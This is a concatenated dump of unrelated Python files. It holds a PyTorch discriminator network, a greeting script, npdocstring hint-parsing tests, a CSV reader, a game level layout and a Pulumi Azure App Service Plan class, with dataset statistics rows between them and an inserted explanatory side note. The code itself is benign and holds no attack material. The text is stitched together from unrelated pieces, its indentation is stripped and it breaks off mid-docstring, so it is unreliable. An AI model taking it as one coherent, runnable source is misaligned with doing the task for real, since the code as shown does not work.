x = F.relu(self.fc3(x_fc2)) + torch.bmm(x_sp, x_fc1.unsqueeze(2)).squeeze(2)
return x
def _compute_fc_in(self):
x = np.random.random([1, self.nL, self.nW, self.nH])
x = torch.from_numpy(x)
x = self.conv1(x.float())
x = self.conv2(x)
conv2shape = x.size()[1:]
x = x.view(x.size(0), -1)
return x.size(1), conv2shape
class DiscriminatorCNN(nn.Module):
def __init__(self, nw=40, nh=40, nl=5,
n_filters=(15, 9),
kernel_size=(15, 11),
n_cell=1, spectral_norm=True,
mid_act_func=nn.LeakyReLU(0.2, inplace=True),
n_units=[128, 256, 512, 256, 128],
p_drop=None):
super(DiscriminatorCNN, self).__init__()
self.nW = nw
self.nH = nh
self.nL = nl
self.nFiltL1 = n_filters[0]
self.nFiltL2 = n_filters[1]
self.szFiltL1 = kernel_size[0]
self.szFiltL2 = kernel_size[1]
self.nCell = n_cell
self.l3_filt_shape = None
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nL,
out_channels=self.nFiltL1,
kernel_size=(self.szFiltL1, self.szFiltL1),
stride=1,
padding=0,
bias=True))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nFiltL1,
out_channels=self.nFiltL2,
kernel_size=(self.szFiltL2, self.szFiltL2),
stride=1,
padding=0,
bias=True))
if torch.cuda.is_available():
self.cuda()
in_shp, conv2outShape = self._compute_fc_in()
self.l3_filt_shape = (self.nCell, *conv2outShape)
dense_layers = OrderedDict()
if spectral_norm:
dense_layers['fcin'] = nn.utils.spectral_norm(nn.Linear(in_shp+self.nCell, n_units[0]))
else:
dense_layers['fcin'] = nn.Linear(in_shp+self.nCell, n_units[0])
dense_layers['act0'] = mid_act_func
for i in range(1, len(n_units)):
if spectral_norm:
dense_layers['fc' + str(i)] = nn.utils.spectral_norm(nn.Linear(n_units[i - 1], n_units[i]))
else:
dense_layers['fc' + str(i)] = nn.Linear(n_units[i - 1], n_units[i])
if p_drop is not None:
dense_layers['dropout' + str(i)] = nn.Dropout(p_drop)
dense_layers['act' + str(i)] = mid_act_func
if spectral_norm:
dense_layers['fcout'] = nn.utils.spectral_norm(nn.Linear(n_units[-1], 1))
else:
dense_layers['fcout'] = nn.Linear(n_units[-1], 1)
self.dense_layers = nn.Sequential(dense_layers)
def forward(self, spike, stim):
x_conv = F.relu(self.conv1(stim))
x_conv = F.relu(self.conv2(x_conv))
x = self.dense_layers(torch.cat((x_conv.view([x_conv.shape[0], -1]), spike.view(spike.size(0), -1)), dim=1))
return x
def _compute_fc_in(self):
x = np.random.random([1, self.nL, self.nW, self.nH])
x = torch.tensor(x)
x = self.conv1(x.float())
x = self.conv2(x)
conv2shape = x.size()[1:]
x = x.view(x.size(0), -1)
return x.size(1), conv2shape
class DiscriminatorCNN_deep(nn.Module):
def __init__(self, nw=40, nh=40, nl=5,
n_filters=(15, 9),
kernel_size=(15, 11),
n_cell=1, spectral_norm=True,
mid_act_func=nn.LeakyReLU(0.2, inplace=True),
n_units=[128, 256, 512, 256, 128],
p_drop=None):
super(DiscriminatorCNN_deep, self).__init__()
self.nW = nw
self.nH = nh
self.nL = nl
self.nFiltL1 = n_filters[0]
self.nFiltL2 = n_filters[1]
self.szFiltL1 = kernel_size[0]
self.szFiltL2 = kernel_size[1]
self.nCell = n_cell
self.l3_filt_shape = None
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nL,
out_channels=self.nFiltL1,
kernel_size=(self.szFiltL1, self.szFiltL1),
stride=1,
padding=0,
bias=True))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nFiltL1,
out_channels=self.nFiltL2,
kernel_size=(self.szFiltL2, self.szFiltL2),
stride=1,
padding=0,
bias=True))
if torch.cuda.is_available():
self.cuda()
in_shp, conv2outShape = self._compute_fc_in()
self.l3_filt_shape = (self.nCell, *conv2outShape)
dense_layers = OrderedDict()
if spectral_norm:
dense_layers['fcin'] = nn.utils.spectral_norm(nn.Linear(in_shp+self.nCell, n_units[0]))
else:
dense_layers['fcin'] = nn.Linear(in_shp+self.nCell, n_units[0])
dense_layers['act0'] = mid_act_func
for i in range(1, len(n_units)):
if spectral_norm:
dense_layers['fc' + str(i)] = nn.utils.spectral_norm(nn.Linear(n_units[i - 1], n_units[i]))
else:
dense_layers['fc' + str(i)] = nn.Linear(n_units[i - 1], n_units[i])
if p_drop is not None:
dense_layers['dropout' + str(i)] = nn.Dropout(p_drop)
dense_layers['act' + str(i)] = mid_act_func
if spectral_norm:
dense_layers['fcout'] = nn.utils.spectral_norm(nn.Linear(n_units[-1], 1))
else:
dense_layers['fcout'] = nn.Linear(n_units[-1], 1)
self.dense_layers = nn.Sequential(dense_layers)
def forward(self, spike, stim):
x_conv = F.relu(self.conv1(stim))
x_conv = F.relu(self.conv2(x_conv))
x = self.dense_layers(torch.cat((x_conv.view([x_conv.shape[0], -1]), spike.view(spike.size(0), -1)), dim=1))
return x
def _compute_fc_in(self):
x = np.random.random([1, self.nL, self.nW, self.nH])
x = torch.tensor(x)
x = self.conv1(x.float())
x = self.conv2(x)
conv2shape = x.size()[1:]
x = x.view(x.size(0), -1)
return x.size(1), conv2shape
if __name__ == '__main__':
d = DiscriminatorCNN(n_cell=8)
stim = torch.rand(10, 5, 40, 40)
spike = torch.randn(10, 8)
out = d(spike, stim)
assert out.shape == (10, 1), "Error in the output shape"
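A side note on `_compute_fc_in` above: it derives the flattened feature size empirically by pushing a dummy tensor through both convolutions. With stride 1 and no padding, the same size also follows from standard convolution arithmetic — a small stdlib-only sketch (the helper name is ours, not part of the module):

```python
def conv_out_side(side, kernel, stride=1, padding=0):
    # Standard conv output formula: floor((side + 2*padding - kernel) / stride) + 1
    return (side + 2 * padding - kernel) // stride + 1

# Defaults from DiscriminatorCNN: 40x40 input, 15x15 then 11x11 kernels, stride 1, no padding.
side = conv_out_side(conv_out_side(40, kernel=15), kernel=11)  # 40 -> 26 -> 16
flat_features = 9 * side * side  # the second conv emits 9 filter maps
print(side, flat_features)  # 16 2304
```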
| 41.652542 | 115 | 0.504476 | 1,215 | 9,830 | 3.877366 | 0.106996 | 0.066228 | 0.057313 | 0.072596 | 0.897049 | 0.889408 | 0.871577 | 0.871577 | 0.851412 | 0.851412 | 0 | 0.043294 | 0.377314 | 9,830 | 235 | 116 | 41.829787 | 0.726352 | 0 | 0 | 0.836735 | 0 | 0 | 0.010682 | 0 | 0 | 0 | 0 | 0 | 0.005102 | 1 | 0.045918 | false | 0 | 0.02551 | 0 | 0.117347 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
036b806eecbddaf1a2fc7282261425154f086732 | 88 | py | Python | codeabbey/ejerciciospracticepython/ejercicio3udemy.py | rubyal/calculadora | f86a106651816efb18d94acf58160721d350ee7d | [
"Unlicense"
] | null | null | null | codeabbey/ejerciciospracticepython/ejercicio3udemy.py | rubyal/calculadora | f86a106651816efb18d94acf58160721d350ee7d | [
"Unlicense"
] | null | null | null | codeabbey/ejerciciospracticepython/ejercicio3udemy.py | rubyal/calculadora | f86a106651816efb18d94acf58160721d350ee7d | [
"Unlicense"
] | null | null | null | print("Hello " + input("What is your name? "))
print(len(input("what is your name? ")))
| 29.333333 | 46 | 0.636364 | 14 | 88 | 4 | 0.571429 | 0.321429 | 0.392857 | 0.535714 | 0.678571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147727 | 88 | 2 | 47 | 44 | 0.746667 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
30306ade89ff7388017ed85c165c966d7db97b2a | 1,296 | py | Python | npdocstring/tests/test_parse_hint.py | tgy/npdocstring | d885c1eab4ca32941a31e8219dc1b29285d7b2bb | [
"MIT"
] | 1 | 2018-08-20T15:05:29.000Z | 2018-08-20T15:05:29.000Z | npdocstring/tests/test_parse_hint.py | tgy/npdocstring | d885c1eab4ca32941a31e8219dc1b29285d7b2bb | [
"MIT"
] | null | null | null | npdocstring/tests/test_parse_hint.py | tgy/npdocstring | d885c1eab4ca32941a31e8219dc1b29285d7b2bb | [
"MIT"
] | null | null | null | from ..npdocstring import get_funclassdef_nodes, get_function_arguments
def test_parse_nested_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[0])
assert len(args) == 1
assert args[0].hint == "list of list of int"
def test_parse_union_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[1])
assert len(args) == 1
assert args[0].hint == "list of int or str"
def test_parse_complex_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[2])
assert len(args) == 1
assert args[0].hint == "list of list of int or str"
def test_parse_union_iterable_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[3])
assert len(args) == 1
assert args[0].hint == "int or iterable of int"
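For context on the hint strings asserted above: they are npdocstring's prose renderings of the parameter annotations in `samples/in/hints.py` (not reproduced here). The raw annotation text itself can be recovered with the stdlib `ast` module alone — an illustrative sketch on a made-up one-liner, independent of the library's own helpers (requires Python 3.9+ for `ast.unparse`):

```python
import ast

# Hypothetical source; the real sample file is not shown above.
src = "def f(xs: list[list[int]]): pass"
fn = ast.parse(src).body[0]
hint = ast.unparse(fn.args.args[0].annotation)
print(hint)  # list[list[int]]
```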
| 34.105263 | 71 | 0.708333 | 187 | 1,296 | 4.695187 | 0.208556 | 0.100228 | 0.1082 | 0.08656 | 0.878132 | 0.878132 | 0.878132 | 0.878132 | 0.816629 | 0.816629 | 0 | 0.014856 | 0.168981 | 1,296 | 37 | 72 | 35.027027 | 0.800371 | 0 | 0 | 0.62069 | 0 | 0 | 0.179784 | 0.114198 | 0 | 0 | 0 | 0 | 0.413793 | 1 | 0.137931 | false | 0 | 0.034483 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
305908a5665c4a39d100a6284d538768c0b18165 | 440 | py | Python | csv_reader.py | Gulnaz-Tabassum/hacktoberfest2021 | ffee073f6efa4090244b55966fd69dde51be12f1 | [
"CC0-1.0"
] | 2 | 2021-10-20T13:22:54.000Z | 2021-11-08T09:49:19.000Z | csv_reader.py | Gulnaz-Tabassum/hacktoberfest2021 | ffee073f6efa4090244b55966fd69dde51be12f1 | [
"CC0-1.0"
] | null | null | null | csv_reader.py | Gulnaz-Tabassum/hacktoberfest2021 | ffee073f6efa4090244b55966fd69dde51be12f1 | [
"CC0-1.0"
] | null | null | null | #importing csv
import csv
#opening salary_data.csv from your local computer
file = open("Salary_Data.csv")
csvreader = csv.reader(file)
header = next(csvreader)
print(header)
rows = []
for row in csvreader:
rows.append(row)
print(rows)
file.close()
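The same read can be written more idiomatically with a `with` block (which closes the file automatically) and `csv.DictReader` (which keys each row by the header row) — an alternative sketch using an in-memory stand-in, since `Salary_Data.csv` itself is not available here:

```python
import csv
import io

# In-memory stand-in for Salary_Data.csv; the column names are assumptions.
with io.StringIO("YearsExperience,Salary\n1.1,39343\n2.0,43525\n") as f:
    reader = csv.DictReader(f)
    rows = list(reader)          # each row is a dict keyed by the header
    header = reader.fieldnames

print(header)             # ['YearsExperience', 'Salary']
print(rows[0]["Salary"])  # 39343 (DictReader values are strings)
```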
| 20 | 49 | 0.736364 | 66 | 440 | 4.863636 | 0.348485 | 0.093458 | 0.121495 | 0.11215 | 0.778816 | 0.778816 | 0.778816 | 0.778816 | 0.778816 | 0.778816 | 0 | 0 | 0.134091 | 440 | 21 | 50 | 20.952381 | 0.84252 | 0.138636 | 0 | 0.842105 | 0 | 0 | 0.079576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.105263 | null | null | 0.210526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30795d29f300fff36a087b9d125bb2f6d9487c8a | 4,715 | py | Python | utils/scripts/OOOlevelGen/src/daily_levels/181.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/daily_levels/181.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/daily_levels/181.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | import LevelBuilder
from sprites import *
def render(name,bg):
lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
lb.addObject(Hero.HeroSprite(x=428, y=18,width=32,height=32))
lb.addObject(Beam.BeamSprite(x=101, y=270,width=191,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=319, y=200,width=317,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=129, y=126,width=255,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=303, y=51,width=352,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Enemy.EnemySprite(x=443, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=391, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=340, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=289, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=238, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=187, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=135, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=33, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=443, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=391, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=340, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=443, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=391, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=340, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=289, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=238, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=187, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=84, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=33, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Star.StarSprite(x=433, y=294,width=32,height=32))
lb.addObject(SpikeyBuddy.SpikeyBuddySprite(x=55, y=293,width=40,height=40,restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Beam.BeamSprite(x=28, y=51,width=51,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=395, y=126,width=170,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=47, y=200,width=89,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=381, y=270,width=191,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Friend.FriendSprite(x=238, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=33, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=187, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=136, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=84, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.render()
# Source file: sdk/python/pulumi_azure/appservice/plan.py (repo: aangelisc/pulumi-azure; licenses: ECL-2.0, Apache-2.0)
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PlanArgs', 'Plan']
@pulumi.input_type
class PlanArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
sku: pulumi.Input['PlanSkuArgs'],
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Plan resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input['PlanSkuArgs'] sku: A `sku` block as documented below.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`? Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku", sku)
if app_service_environment_id is not None:
pulumi.set(__self__, "app_service_environment_id", app_service_environment_id)
if is_xenon is not None:
pulumi.set(__self__, "is_xenon", is_xenon)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if location is not None:
pulumi.set(__self__, "location", location)
if maximum_elastic_worker_count is not None:
pulumi.set(__self__, "maximum_elastic_worker_count", maximum_elastic_worker_count)
if name is not None:
pulumi.set(__self__, "name", name)
if per_site_scaling is not None:
pulumi.set(__self__, "per_site_scaling", per_site_scaling)
if reserved is not None:
pulumi.set(__self__, "reserved", reserved)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the App Service Plan component.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> pulumi.Input['PlanSkuArgs']:
"""
A `sku` block as documented below.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: pulumi.Input['PlanSkuArgs']):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="appServiceEnvironmentId")
def app_service_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_service_environment_id")
@app_service_environment_id.setter
def app_service_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "app_service_environment_id", value)
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_xenon")
@is_xenon.setter
def is_xenon(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_xenon", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maximumElasticWorkerCount")
def maximum_elastic_worker_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
"""
return pulumi.get(self, "maximum_elastic_worker_count")
@maximum_elastic_worker_count.setter
def maximum_elastic_worker_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maximum_elastic_worker_count", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="perSiteScaling")
def per_site_scaling(self) -> Optional[pulumi.Input[bool]]:
"""
Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
"""
return pulumi.get(self, "per_site_scaling")
@per_site_scaling.setter
def per_site_scaling(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "per_site_scaling", value)
@property
@pulumi.getter
def reserved(self) -> Optional[pulumi.Input[bool]]:
"""
Is this App Service Plan `Reserved`? Defaults to `false`.
"""
return pulumi.get(self, "reserved")
@reserved.setter
def reserved(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reserved", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _PlanState:
def __init__(__self__, *,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
maximum_number_of_workers: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['PlanSkuArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Plan resources.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[int] maximum_number_of_workers: The maximum number of workers supported with the App Service Plan's sku.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`? Defaults to `false`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input['PlanSkuArgs'] sku: A `sku` block as documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if app_service_environment_id is not None:
pulumi.set(__self__, "app_service_environment_id", app_service_environment_id)
if is_xenon is not None:
pulumi.set(__self__, "is_xenon", is_xenon)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if location is not None:
pulumi.set(__self__, "location", location)
if maximum_elastic_worker_count is not None:
pulumi.set(__self__, "maximum_elastic_worker_count", maximum_elastic_worker_count)
if maximum_number_of_workers is not None:
pulumi.set(__self__, "maximum_number_of_workers", maximum_number_of_workers)
if name is not None:
pulumi.set(__self__, "name", name)
if per_site_scaling is not None:
pulumi.set(__self__, "per_site_scaling", per_site_scaling)
if reserved is not None:
pulumi.set(__self__, "reserved", reserved)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="appServiceEnvironmentId")
def app_service_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_service_environment_id")
@app_service_environment_id.setter
def app_service_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "app_service_environment_id", value)
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_xenon")
@is_xenon.setter
def is_xenon(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_xenon", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maximumElasticWorkerCount")
def maximum_elastic_worker_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
"""
return pulumi.get(self, "maximum_elastic_worker_count")
@maximum_elastic_worker_count.setter
def maximum_elastic_worker_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maximum_elastic_worker_count", value)
@property
@pulumi.getter(name="maximumNumberOfWorkers")
def maximum_number_of_workers(self) -> Optional[pulumi.Input[int]]:
"""
